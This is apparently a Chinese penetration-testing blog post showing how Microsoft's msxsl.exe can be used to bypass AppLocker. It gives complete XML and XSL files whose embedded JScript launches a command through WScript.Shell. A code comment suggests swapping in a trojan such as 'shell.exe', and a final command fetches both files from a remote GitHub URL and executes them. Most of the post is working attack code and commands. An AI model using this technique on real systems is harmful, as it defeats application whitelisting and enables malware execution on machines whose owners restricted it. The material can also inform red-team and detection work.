利用MSXSL.exe绕过AppLocker应用程序控制策略

1.需要用到微软工具MSXSL.exe,msxsl.exe是微软用于命令行下处理XSL的一个程序,所以通过他,我们可以执行JavaScript进而执行系统命令,其下载地址为:

https://www.microsoft.com/en-us/download/confirmation.aspx?id=21714

2.执行该工具需要用到2个文件,分别为XML及XSL文件,其命令如下:

msxsl.exe test.xml exec.xsl

test.xml:

1
2
3
4
5
6
7
8
9
10
11
12
13
<?xml version="1.0"?>
 
<?xml-stylesheet type="text/xsl" href="exec.xsl" ?>
 
<customers>
 
<customer>
 
<name>Microsoft</name>
 
</customer>
 
</customers>

 

exec.xsl

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
<?xml version='1.0'?>
 
<xsl:stylesheet version="1.0"
 
xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
 
xmlns:msxsl="urn:schemas-microsoft-com:xslt"
 
xmlns:user="http://mycompany.com/mynamespace">
 
  
 
<msxsl:script language="JScript" implements-prefix="user">
 
   function xml(nodelist) {
 
var r = new ActiveXObject("WScript.Shell").Run("cmd /c calc.exe");
 
//这里可以改造为执行你的木马文件如:
 
// var r = new ActiveXObject("WScript.Shell").Run("cmd /k cd c:\ & shell.exe");
 
   return nodelist.nextNode().xml;
 
  
 
   }
 
</msxsl:script>
 
<xsl:template match="/">
 
   <xsl:value-of select="user:xml(.)"/>
 
</xsl:template>
 
</xsl:stylesheet>

  

3.最终执行结果为:

 

 

4.也可以远程执行:

msxsl.exe https://raw.githubusercontent.com/backlion/demo/master/test.xml  https://raw.githubusercontent.com/backlion/demo/master/exec.xsl

 

posted @   渗透测试中心  阅读(921)  评论(0编辑  收藏  举报
编辑推荐:
· .NET Core 中如何实现缓存的预热?
· 从 HTTP 原因短语缺失研究 HTTP/2 和 HTTP/3 的设计差异
· AI与.NET技术实操系列:向量存储与相似性搜索在 .NET 中的实现
· 基于Microsoft.Extensions.AI核心库实现RAG应用
· Linux系列:如何用heaptrack跟踪.NET程序的非托管内存泄露
阅读排行:
· TypeScript + Deepseek 打造卜卦网站:技术与玄学的结合
· 阿里巴巴 QwQ-32B真的超越了 DeepSeek R-1吗?
· 【译】Visual Studio 中新的强大生产力特性
· 10年+ .NET Coder 心语 ── 封装的思维:从隐藏、稳定开始理解其本质意义
· 【设计模式】告别冗长if-else语句:使用策略模式优化代码结构
点击右上角即可分享
微信分享提示